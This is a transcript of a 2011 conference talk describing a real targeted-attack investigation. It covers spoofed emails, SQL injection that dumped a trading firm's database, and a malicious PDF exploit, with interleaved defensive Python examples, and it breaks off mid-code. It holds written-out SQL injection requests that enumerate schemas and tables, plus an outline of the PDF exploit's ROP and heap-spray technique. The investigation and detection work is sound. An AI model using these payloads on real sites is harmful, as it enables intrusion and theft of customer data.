Cybercrime in nowadays businesses - A real case study of targeted attack


DESCRIPTION

Through a real case study, we will explore the complexity of such attacks which endanger today's businesses. All: https://www.htbridge.ch/publications/cybercrime_in_nowadays_businesses_a_real_case_study_of_targeted_attack.html

TRANSCRIPT

Page 1: Cybercrime in nowadays businesses - A real case study of targeted attack

ORIGINAL SWISS ETHICAL HACKING

Your texte here ….

©2011 High-Tech Bridge SA – www.htbridge.ch

Hashdays 2011

Cybercrime in nowadays businesses:

A real case study of targeted attack

Frédéric BOURLA

Head of Ethical Hacking Department

©2011 High-Tech Bridge SA – www.htbridge.ch

Page 2: Cybercrime in nowadays businesses - A real case study of targeted attack


0x00 - #whoami

Frédéric BOURLA

Head of Ethical Hacking Department

High-Tech Bridge SA

~12 years experience in Information Security

LPT, CISSP, CCSE, CCSA, ECSA, CEH, eCPPT

CHFI, GCFA & GREM in progress

RHCE, RHCT, MCP

[email protected]

Page 3: Cybercrime in nowadays businesses - A real case study of targeted attack


0x01 - #readelf prez

- Cyber attacks have evolved:
  - They became more sophisticated
  - They are often targeted
  - It is not uncommon anymore to observe attacks managed by specialized groups and initiated by unfair competitors
- This talk is an example of such threats. It is based on a post-incident investigation which took place in October 2010. To preserve the client's anonymity, let's call him Fedor-Trading.
- 1 round of 50'. To save time, please keep your questions until the end.

Page 4: Cybercrime in nowadays businesses - A real case study of targeted attack


Table of contents

0x00 - About me

0x01 - About this conference

0x02 - Project’s context

0x03 - Mail analysis

0x04 - Client’s Website analysis

0x05 - Malware analysis

0x06 - Conclusion

Page 5: Cybercrime in nowadays businesses - A real case study of targeted attack


0x02 - Project's context

- Last year, the CTO of a well known financial institution contacted us.
- Fedor-Trading thought about a kind of Phishing attempt, and the CTO expected us to help him reassure the CEO that everything was fine, and that no real attack really occurred.
- The initial project was a quick investigation driven by political reasons, and it began with an analysis of the emails that they received in one of their administrative mailboxes.


Page 7: Cybercrime in nowadays businesses - A real case study of targeted attack


0x03 - Mail analysis

- They received several emails which appeared to have been sent from Fedor-Trading:

Page 8: Cybercrime in nowadays businesses - A real case study of targeted attack


0x03 - Mail analysis

- At first glance, the suspicious emails received didn't look like Phishing:
  - There was no multiple spelling mistake per line
  - The content itself sounded sophisticated
  - All emails dealt with real matters and enticed Forex users to open a PDF
- Instead, all those emails sounded like targeted attacks.

Page 9: Cybercrime in nowadays businesses - A real case study of targeted attack


0x03 - Mail analysis

- SMTP headers reveal the sending domain:

Page 10: Cybercrime in nowadays businesses - A real case study of targeted attack


0x03 - Mail analysis

- The FQDN matches IP address 67.227.134.84.
- The hosting server is located in the US.

Page 11: Cybercrime in nowadays businesses - A real case study of targeted attack


0x03 - Mail analysis

- The parent domain neonrain-vps.com has belonged to Neon Rain Interactive since 26 March 2008.

Page 12: Cybercrime in nowadays businesses - A real case study of targeted attack


0x03 - Mail analysis

- The remote system hosted an out-of-date Apache engine and was weakly configured:
  - Talkative banners
  - Some indexed directories
  - Lots of Information Disclosure
  - Publicly available cPanel interface
  - Some outdated components

Page 13: Cybercrime in nowadays businesses - A real case study of targeted attack


0x03 - Mail analysis

- A reverse DNS lookup showed that the IP address 67.227.134.84 was used to host multiple websites.
- At least 82 domains were hosted on the same server.
- The combination of these factors gave us a strong likelihood that the malicious emails were sent from a compromised Web server, thus concealing the identity of the attackers.

Page 14: Cybercrime in nowadays businesses - A real case study of targeted attack


0x03 - Mail analysis

- Domain host.neonrain-vps.com had an MX record for this host.
- This configuration permitted to bypass most antispam protections, and all Fedor-Trading's clients who did not rely on a deeper SMTP analysis have probably received those suspicious emails.
- A quick analysis of the received emails consequently led us to think about a targeted attack, and not a blind one… We definitely needed to get more information and asked for FTP access to Fedor-Trading's website.
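The header analysis of the preceding mail-analysis slides, as an added Python example that is not part of the talk: it parses a constructed message whose Received: chain ends at a third-party VPS (the hostname and IP address are the ones quoted on the slides; the client-side hosts, queue IDs and addresses are invented), walks the hops back to the first routable source, and compares that origin with the domain claimed in From: and Message-ID. No DNS is queried so it runs offline; in a real investigation the origin IP would then be checked against reverse DNS, the claimed sender's SPF policy and the MX record the slide mentions.

```python
import email
import email.utils
import ipaddress
import re

# Constructed sample message (not one of the real emails). The From: header
# claims the client's domain, while the Received: chain shows the message
# entering the Internet from the VPS host named on the slides.
SAMPLE_MESSAGE = b"""Received: from mx.client-side.example (mx.client-side.example [192.0.2.10])
\tby mail.client-side.example with ESMTP id 4F0A1; Fri, 8 Oct 2010 09:12:01 +0200
Received: from host.neonrain-vps.com (host.neonrain-vps.com [67.227.134.84])
\tby mx.client-side.example with ESMTP id 7C3B2; Fri, 8 Oct 2010 09:11:58 +0200
Received: from localhost (localhost [127.0.0.1])
\tby host.neonrain-vps.com (Postfix) with ESMTP id A1B2C3; Fri, 8 Oct 2010 07:11:55 +0000
From: "Fedor-Trading Support" <support@fedor-trading.example>
To: customer@client-side.example
Subject: Important update regarding your Forex account
Message-ID: <20101008071155.A1B2C3@host.neonrain-vps.com>

Please find the attached PDF.
"""

# "from <helo> (<rdns> [<ip>]) by <host>" as written by most MTAs.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[0-9.]+)\]\)\s+by\s+(?P<by>\S+)",
    re.IGNORECASE,
)


def parse_received(msg):
    """Return the Received: hops in chronological order (earliest first).
    MTAs prepend Received: headers, so the raw header order is newest first."""
    hops = []
    for value in msg.get_all("Received", []):
        flat = " ".join(str(value).split())  # unfold continuation lines
        m = RECEIVED_RE.search(flat)
        if m:
            hops.append(m.groupdict())
    hops.reverse()
    return hops


def find_origin(hops):
    """First hop whose source address is routable: the real sending host.
    Loopback/private hops are the sender's own internal relaying."""
    for hop in hops:
        try:
            addr = ipaddress.ip_address(hop["ip"])
        except ValueError:
            continue
        if not (addr.is_private or addr.is_loopback):
            return hop
    return None


def base_domain(host):
    """Crude registrable-domain heuristic (last two labels); enough for a triage."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def analyse(raw):
    """Compare the claimed sender domain with where the message really came from."""
    msg = email.message_from_bytes(raw)
    origin = find_origin(parse_received(msg)) or {}
    claimed = email.utils.parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
    msgid_domain = (msg.get("Message-ID") or "").strip("<> ").rpartition("@")[2]
    origin_host = origin.get("rdns") or origin.get("helo") or ""
    return {
        "claimed_domain": claimed,
        "origin_ip": origin.get("ip"),
        "origin_host": origin_host,
        "message_id_domain": msgid_domain,
        "domain_mismatch": bool(origin_host) and base_domain(origin_host) != base_domain(claimed),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_MESSAGE).items():
        print(f"{key:18} {value}")
```

The mismatch flag is only a triage signal: legitimate bulk mailers also send from third-party hosts, which is exactly why the slide stresses that a deeper SMTP analysis (reverse DNS, MX and SPF checks on the origin) is needed before calling a message spoofed.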


Page 16: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- The frontal website was hosted externally, on Infomaniak Network.
- The first thing we noticed is that the website hosted a talkative «robots.txt» file:

Page 17: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- The passwd file revealed several forgotten accounts, but no trace of a potential compromise.
- The website contained a huge amount of logs. We downloaded them to carry out a local inspection.

Page 18: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- Fedor-Trading's website was often under automated attacks.

Page 19: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- In parallel with attack pattern queries in those huge logs (quite slow, as there was no timeframe for this hypothetical attack), we looked furtively at the website's security level.
- Although a kind of Web Application Firewall successfully prevented our first attacks, the website sounded vulnerable to SQLi.

Page 20: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- We parsed the logs for usual SQL injection signatures, and lots of occurrences were also identified.

Page 21: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- Quite evolved injections were attempted.
- The first identified attacks were unsuccessful and only relied on automated exploitation tools.
- For example, the banner & hexadecimal constant used while trying to determine the number of fields in the SQL query indicated the Havij tool.

Page 22: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- The next step therefore consisted in simulating such automated attacks to assess the level of information which could have been collected by hackers.
- Indeed, we used the current 1.12 version of Havij against Fedor-Trading.
- This tool has been proven inefficient in this specific case.

Page 23: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- Nevertheless it permitted to confirm the SQLi attack vector, as the name of the database was successfully dumped.

Page 24: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- In order to efficiently identify successful SQLi exploitation in the huge web server logs, we asked the client for temporary credentials on their Infomaniak web administration page.
- This offered us the best view of operational structures, and therefore permitted to fine-tune our queries with keywords which had a high probability of occurrence in case of successful SQLi exploitation.
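The log triage of the last few slides (generic SQLi signatures, the Havij fingerprint, and the schema-keyword tuning just described), as an added Python example that is not the talk's tooling: it parses constructed Apache combined-format lines, URL-decodes each request, matches generic injection patterns, and then applies the keyword tuning with the two table names the talk quotes (jos_users and TAibs_c) to separate blind probing from requests that could only be written after enumeration succeeded. The hex constant used as a Havij marker is a well-known fingerprint of that tool and is an assumption of this example, not a value quoted on the slide; all IP addresses, timestamps and sizes are invented.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache "combined" log lines (not the client's real logs). One line
# reproduces the request format shown later in the talk; the table names are
# the ones the talk quotes, everything else is invented.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2010:03:14:07 +0200] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Oct/2010:03:15:01 +0200] "GET /index.php?id=3%20and%201=1 HTTP/1.1" 200 8123 "-" "Mozilla/4.0"
198.51.100.23 - - [12/Oct/2010:03:15:02 +0200] "GET /index.php?id=3%20union%20select%200x31303235343830303536,2,3-- HTTP/1.1" 200 8150 "-" "Mozilla/4.0"
198.51.100.23 - - [12/Oct/2010:03:16:40 +0200] "GET /index.php?id=3-9999+union+SELECT%20schema_name%20FROM%20information_schema.schemata%20limit%203,1-- HTTP/1.1" 200 8101 "-" "Mozilla/4.0"
198.51.100.23 - - [12/Oct/2010:03:20:12 +0200] "GET /index.php?id=3-9999+union+SELECT%20username%20FROM%20jos_users%20limit%200,1-- HTTP/1.1" 200 8390 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Oct/2010:03:21:00 +0200] "GET /images/logo.png HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Oct/2010:03:22:31 +0200] "GET /index.php?id=3-9999+union+SELECT%20login%20FROM%20TAibs_c%20limit%200,1-- HTTP/1.1" 200 8402 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"'
)

# Generic injection signatures, matched against the URL-decoded request.
SQLI_SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s|/\*.*?\*/)+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "comment_terminator": re.compile(r"--\s*$"),
    # Assumption (well-known Havij marker, not quoted on the slide): Havij
    # probes the column count with this hex constant, which fingerprints the tool.
    "havij_marker": re.compile(r"0x31303235343830303536", re.I),
}

# Keyword tuning: real table names only appear in a request once the attacker
# has already enumerated the schema, so they separate probing from success.
SUCCESS_KEYWORDS = ("jos_users", "TAibs_c")


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["path"])  # handles %20 and '+' alike
    return rec


def classify(decoded_path):
    hits = {name for name, rx in SQLI_SIGNATURES.items() if rx.search(decoded_path)}
    hits |= {"schema:" + kw for kw in SUCCESS_KEYWORDS if kw in decoded_path}
    return hits


def scan(log_text):
    """Flag injection attempts, count them per source IP, and single out the
    requests that name real tables and got a 200: the likely successful dumps."""
    flagged, per_ip = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        hits = classify(rec["decoded"])
        if hits:
            rec["hits"] = sorted(hits)
            flagged.append(rec)
            per_ip[rec["ip"]] += 1
    likely_success = [r for r in flagged
                      if r["status"] == "200" and any(h.startswith("schema:") for h in r["hits"])]
    return {"flagged": flagged, "per_ip": per_ip, "likely_success": likely_success}


if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for rec in result["flagged"]:
        print(rec["ip"], rec["ts"], rec["hits"])
    print("per source:", dict(result["per_ip"]))
    print("likely successful:", [r["ts"] for r in result["likely_success"]])
```

Decoding before matching matters: the same payload arrives as `%20` or `+` encoded and a signature applied to the raw path misses one of the two forms. The schema-keyword pass is the cheap filter the slide describes: it turns a slow full-text search over gigabytes of logs into a short list of requests worth reading by hand.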

Page 25: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- This was much faster.
- New attacks were quickly identified.
- More pernicious, those attacks clearly showed that Fedor-Trading's website was compromised, and that nearly the whole backend database was stolen.

Page 26: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- Indeed, most tables were remotely dumped by hackers, and the email addresses of our client's customers were stolen.
- The source IP address 89.165.79.237 was located in Iran and didn't host any publicly available service. It was most probably a bot intended to hide the attackers' identity.

Page 27: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- The impacted web application consisted of self-made code as well as the Joomla open source CMS and several commercial plugins.
- The exploited vulnerability resided in a Joomla commercial plugin named Sh404Sef. The latter security module provides SEO, analytics and URL Rewriting. It is also supposed to prevent XSS, flooding and other malicious page requests… But unfortunately it allowed hackers to inject SQL code. In that particular case, the security module brought insecurity.

Page 28: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- The SQLi vulnerability was a little bit tricky, and none of the leading automated tools was able to exploit it.
- Most of them didn't even detect any security problem on Fedor-Trading's website.
- The facts are that only a slow and manual attack could have permitted its exploitation.

Page 29: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- As a PoC, we demonstrated that the following parameters in GET requests permitted to remotely dump all sensitive information from the backend database:

Page 30: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- In this attack, the information leakage occurred in the title bar of the Internet browser's window.
- The 1st request simply permits to identify the PHP engine version.

Page 31: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- Requests 2 and 3 permit to get the username and database name.

Page 32: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- Requests 4 to 6 permit to list databases.

Page 33: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- GSDB only hosts 3 databases, as there is no result for the 7th GET request:

?id=3-9999+union+SELECT%20schema_name%20FROM%20information_schema.schemata%20limit%203,1--

Page 34: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- Requests 8 and 9 permit to get the schema and tables.

Page 35: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- The 10th request permits to enumerate tables from the main database.
- Request 11 enumerates columns from the jos_users table.

Page 36: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- And finally the 12th request permits to collect names, emails and password hashes from the jos_users table.
- With a small automation script, it was possible to remotely dump all sensitive tables, such as personal data related to Forex accounts from the TAibs_c table and the trading platform administrators' password hash from the USERS table.

Page 37: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- After version 1.5, Joomla relied on a random salt in its password hashing function.
- This approach permits to efficiently disturb Time-Memory TradeOff attacks:

$hash=md5($pass.$salt)

- Since then, Rainbow Tables attacks against accounts gathered from compromised Joomla websites remain inefficient.

Page 38: Cybercrime in nowadays businesses - A real case study of targeted attack


- Nevertheless, one of the administrators' accounts had no salt. The password was therefore stored as a weak MD5 hash. It was most probably an old account created with a previous version of the web application, which remained unchanged since the migration.
- The vulnerable account belonged to an external consultant.

Anonymised:Anonymised:anonymised@anonymised.com:c2e285cb33cecdbeb83d2189e983a8c0
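The salted hash scheme of the previous slide and the legacy account above, as an added Python example (not the talk's code and not Joomla's own implementation): it mirrors the slide's md5($pass.$salt) formula, audits a constructed credential dump for records stored without a salt, and shows why a precomputed table recovers the unsalted entry but not the salted one. Usernames, passwords and the salt are constructed; the anonymised hash from the slide is not used.

```python
import hashlib


def joomla_hash(password, salt):
    """Mirrors the slide's formula for Joomla 1.5+: $hash = md5($pass.$salt)."""
    return hashlib.md5((password + salt).encode()).hexdigest()


def make_record(user, email_addr, password, salt=None):
    """Build a 'user:email:stored' line. Joomla keeps salted hashes as
    '<md5hex>:<salt>'; a legacy account keeps a bare, unsalted md5."""
    if salt is None:
        return f"{user}:{email_addr}:{hashlib.md5(password.encode()).hexdigest()}"
    return f"{user}:{email_addr}:{joomla_hash(password, salt)}:{salt}"


# Constructed credential dump: one current admin with a salt, one external
# consultant account migrated from an older version without one. Names,
# passwords and salt are invented (Joomla itself draws the salt at random).
SAMPLE_RECORDS = [
    make_record("admin", "admin@fedor-trading.example", "Tr@d1ng-Platf0rm!2010", "rK8vL2pQ9sXe4Tm1"),
    make_record("consultant", "consultant@partner.example", "winter2010"),
]
WEAK_WORDLIST = ["password", "123456", "winter2010", "forex", "trading"]

HEX32 = frozenset("0123456789abcdef")


def stored_part(record):
    """Everything after 'user:email:', i.e. the hash (and salt, if any)."""
    return record.split(":", 2)[2]


def is_salted(stored):
    """True for Joomla's '<32 hex>:<salt>' layout, False for a bare md5."""
    digest, sep, salt = stored.partition(":")
    return bool(sep) and len(digest) == 32 and set(digest) <= HEX32 and len(salt) > 0


def find_unsalted(records):
    """Audit step: list accounts whose password is stored as an unsalted md5."""
    return [rec.split(":", 1)[0] for rec in records if not is_salted(stored_part(rec))]


def build_lookup_table(wordlist):
    """Stand-in for a rainbow table: md5 of each candidate, computed once in advance."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}


def lookup(stored, table):
    """A precomputed table can only match a bare md5. For a salted record the
    digest depends on the per-account salt, so no table built beforehand holds it."""
    return table.get(stored.partition(":")[0])


if __name__ == "__main__":
    print("unsalted accounts:", find_unsalted(SAMPLE_RECORDS))
    table = build_lookup_table(WEAK_WORDLIST)
    for rec in SAMPLE_RECORDS:
        print(rec.split(":", 1)[0], "->", lookup(stored_part(rec), table))
```

The audit is the actionable part: any stored value that is 32 hex characters with no `:salt` suffix is a pre-migration account and should be forced through a password reset. The salt only defeats precomputation, though; MD5 is fast enough that weak salted passwords still fall to direct dictionary attacks, which is why later Joomla releases moved to bcrypt.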

Page 39: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- It was possible to break it in a few seconds.
- Hackers never logged in with this account.
- Fortunately, a noisy defacing would have been out of scope and totally counterproductive.

Page 40: Cybercrime in nowadays businesses - A real case study of targeted attack


0x04 - Client's Website analysis

- Internal admin accounts were salted and strong enough to resist most dictionary attacks.


Page 42: Cybercrime in nowadays businesses - A real case study of targeted attack


0x05 - Malware analysis

- After having stolen MySQL databases through an SQL Injection on the trading platform, hackers ran into a Social Engineering phase which targeted Forex users. Most of them received a credible fake email which enticed them into opening an embedded PDF file.
- Therefore, the last part of the attack which required a deep analysis dealt with the PDF files attached to the fake emails.
- Several emails were sent, but all of them included a renamed version of the same PDF.

Page 43: Cybercrime in nowadays businesses - A real case study of targeted attack


0x05 - Malware analysis

- PDF is one of the most prevalent methods for remote exploitation:
  - Victims can easily be sent targeted socially engineered emails with such attachments
  - PDF links are common on websites and may permit drive-by exploitation
  - This file format is widely spread among companies and most often authorized by perimeter protections
  - It is still quite hard for antivirus to detect malicious content

Page 44: Cybercrime in nowadays businesses - A real case study of targeted attack


0x05 - Malware analysis

- On the 9th October 2010, only 4 antivirus out of 43 detected a threat in this PDF, which is a 9.3% detection rate:
  - AntiVir
  - Emsisoft
  - Ikarus
  - Microsoft
- One year later, on the 13th October 2011, only 16 antivirus out of 43 efficiently detect a threat. This is still a low detection rate of 37.2%.

Page 45: Cybercrime in nowadays businesses - A real case study of targeted attack


0x05 - Malware analysis

- Indeed, PDF supports different compression formats which help hiding code:
  - FlateDecode
  - ASCIIHexDecode
  - LZWDecode
  - ASCII85Decode
  - RunLengthDecode
- It also supports encryption:
  - 40+128 bits RC4
  - 128 bits AES

Page 46: Cybercrime in nowadays businesses - A real case study of targeted attack


0x05 - Malware analysis

- And the PDF format also natively supports Unicode, Hex as well as fromCharCode. All of them are widely used for obfuscation purposes.
- Internal logical streams can embed other objects which support further client side scripting, such as Flash's ActionScript.
- It offers an efficient way to carry out Heap Spraying and Egg Hunting.
- For all those reasons, PDF is an attack vector of choice for hackers.

Page 47: Cybercrime in nowadays businesses - A real case study of targeted attack


0x05 - Malware analysis

- In our case, the maliciously crafted PDF file exploited a critical vulnerability which affected all Adobe Reader applications prior to version 9.4 on multiple OS (CVE-2010-2883).
- Opening this file within Adobe Reader v9.3.4 or any older version could alter its execution flow and run arbitrary code.
- This vulnerability was actively exploited on the Internet when the attack occurred. Since Adobe Reader v.9.4 was publicly available on 5th October 2010, this attack implied a 0-day with a high rate of successful compromise.

Page 48: Cybercrime in nowadays businesses - A real case study of targeted attack


0x05 - Malware analysis

- A quick search for risky keywords within PDFiD revealed client-side code.

[PDFiD output screenshot; callouts: "Quite unusual in malicious PDF", "Action automatically performed", "executed on form load"]

Page 49: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The proportion of randomness in the file can also tell us more about this PDF.

- The total entropy and the entropy of bytes inside stream objects are close to the maximum of 8, which suggests a normal PDF document.

Page 50: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Nevertheless, the entropy outside stream objects is also quite high. In a normal PDF, it is usually between 4 and 5. This may lead us to think about a malformed PDF document, where data has been added outside of stream objects.

- We can also notice that there is only one %%EOF in the document, despite there being lots of bytes after the last %%EOF, which also suggests that data has been added.
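The checks described on the last three slides (risky keyword counts as PDFiD reports them, entropy inside versus outside stream objects, and the %%EOF count together with the bytes that follow the last one) can be run from a short script. The following is an added example written for this page, not a tool from the presentation or from High-Tech Bridge. The two PDF byte strings are constructed inline: the "clean" one carries JavaScript triggered from the catalog, the second one is the same file with data appended after %%EOF, which is exactly the malformation the slide describes. Keyword names are un-escaped before counting so that a hex-escaped /Op#65nAction is still counted as /OpenAction.

```python
import math
import re
from collections import Counter
from typing import Tuple

# Names a PDFiD-style triage looks for. Names may be hex-escaped (/J#61vaScript),
# so they are decoded before counting.
RISKY_NAMES = ("JavaScript", "JS", "OpenAction", "AA", "AcroForm", "Launch",
               "EmbeddedFile", "RichMedia", "ObjStm", "XFA")

NAME_RE = re.compile(rb"/([A-Za-z0-9#_.+-]+)")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
EOF_MARK = b"%%EOF"


def decode_name(raw: bytes) -> str:
    """Undo PDF #xx escapes so that /Op#65nAction counts as /OpenAction."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the maximum (uniform, compressed or encrypted data)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def split_streams(data: bytes) -> Tuple[bytes, bytes]:
    """Return (bytes inside stream objects, everything else)."""
    inside = b"".join(STREAM_RE.findall(data))
    outside = STREAM_RE.sub(b"stream\nendstream", data)
    return inside, outside


def triage(data: bytes) -> dict:
    """Keyword counts, object/stream bookkeeping, entropy split and %%EOF analysis."""
    names = Counter(decode_name(n) for n in NAME_RE.findall(data))
    inside, outside = split_streams(data)
    last_eof = data.rfind(EOF_MARK)
    return {
        "keywords": {k: names[k] for k in RISKY_NAMES if names[k]},
        "obj": len(re.findall(rb"\d+\s+\d+\s+obj\b", data)),
        "endobj": data.count(b"endobj"),
        "stream": len(STREAM_RE.findall(data)),
        "entropy_total": shannon_entropy(data),
        "entropy_inside_streams": shannon_entropy(inside),
        "entropy_outside_streams": shannon_entropy(outside),
        "eof_count": data.count(EOF_MARK),
        # Anything after the last %%EOF is outside the document structure.
        "bytes_after_last_eof": 0 if last_eof < 0 else len(data) - last_eof - len(EOF_MARK),
    }


# Constructed sample: 64 distinct byte values in the only stream -> entropy exactly 6.0.
STREAM_BODY = bytes(range(64))
CLEAN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /Op#65nAction 3 0 R /AcroForm 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /JavaScript /JS 7 0 R >> endobj\n"
    b"4 0 obj << /Fields [] >> endobj\n"
    b"7 0 obj << /Length 64 >>\nstream\n" + STREAM_BODY + b"\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
# Constructed: 512 high-entropy bytes appended after %%EOF, standing in for data
# hidden outside any stream object (each byte value occurs exactly twice).
APPENDED = bytes((i * 37) % 256 for i in range(512))
SUSPICIOUS_PDF = CLEAN_PDF + APPENDED


if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_PDF), ("with appended data", SUSPICIOUS_PDF)):
        print(label, triage(doc))
```

On the constructed sample the appended block lifts the outside-stream entropy well above the 4 to 5 range the slide gives for a normal document, while the inside-stream entropy is unchanged; the single %%EOF followed by several hundred bytes is the second indicator the slide points out.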

Page 51: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- So a good idea should be to dig a little bit further with Origami. Unfortunately the Walker GUI was tricked into errors.

Page 52: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Command line extraction also ran into problems, but at least confirmed some results.

Page 53: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- In fact, even Adobe Reader thought the file was damaged. Unfortunately it still managed to read it.

Page 54: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The logical flaw remained easy to identify.

Page 55: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Nevertheless, we were still not able to extract the embedded JavaScript code.

Page 56: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Object 3 contains the string “/JavaScript” and was configured to execute code from object 7. Object 30 also contained the string “/JS” and holds code.

Page 57: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Nevertheless, the payload was quite heavily obfuscated.

Page 58: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Most crafted PDFs rely on a simple XOR with a single byte long key or use ROL/ROR operations for obfuscation purposes…

- But not here. As a consequence, tools like XorSearch didn't get any result.

- The only solution seemed to be the reverse engineering approach.

Page 59: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Indeed, the interesting content was encrypted with a 4 bytes XOR operation.

Page 60: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- After the identification of the 4 bytes key 0x4114D345, we were able to extract the “mea.dll” file embedded in the malicious PDF.

- This one was not encrypted, and revealed the final URL which hosted the ultimate payload, as confirmed by the following analysis.

Page 61: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Opening CoolType.dll from Adobe Reader in IDA revealed the abused “strcat”. The “uniqueName” field from the SING table structure was being used in that function.

Page 62: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The exploit relied on /AcroForm JavaScript to detect the version of Adobe Reader and switch to the appropriate payload.

- Then the heap spray was used to put ROP data into memory at a guessable address. This heap spray followed a huge RET sled, which acted as a more classical NOP string while transitioning between the stack Buffer Overflow and the ROP payload.

- Gadgets used in the ROP payload come from the module “icucnv36.dll”, which was not compiled with ASLR, as discussed soon.

Page 63: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Attackers used ROP techniques. Instead of redirecting the execution flow to the heap, it jumps to a Code section in a DLL, which indeed has the Execute right. This is achieved by overwriting the Saved EIP on the stack, and by chaining calls into this DLL at specific places through a RET sled crafted on the stack.

Page 64: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The exploit created an empty iso88591 file and mapped it to memory in order to get an executable space, where shellcode could be copied and executed.

Page 65: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The AcroRd32.exe process was also abused to load the icucnv34.dll module, a DLL which was not compiled with ASLR and is therefore always loaded at the same address in memory. It is then possible to use its own IAT to get the addresses of ASLRed Kernel32 APIs.
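Two points from the preceding slides lend themselves to one worked example: a payload XORed with a 4-byte key defeats single-byte tools such as XorSearch but not a known-plaintext search (slides 58 to 60), and a DLL's ASLR/DEP opt-in is a flag in its PE header that can be read without running the module (slides 62 and 65). The Python below is an added example, not code from the presentation or from High-Tech Bridge. It builds a constructed stand-in for the embedded DLL, encrypts it with the slide's key 0x4114D345 (byte order assumed big-endian, since the slide does not say), recovers the key from the DOS stub text that every PE image carries, and reports whether DYNAMIC_BASE (ASLR) and NX_COMPAT (DEP) are set in DllCharacteristics, which is the check that identifies a module such as icucnv36.dll as loaded at a fixed address.

```python
import struct
from itertools import cycle
from typing import Optional, Tuple

# Constructed: the 4-byte key reported on the slide, taken in big-endian byte
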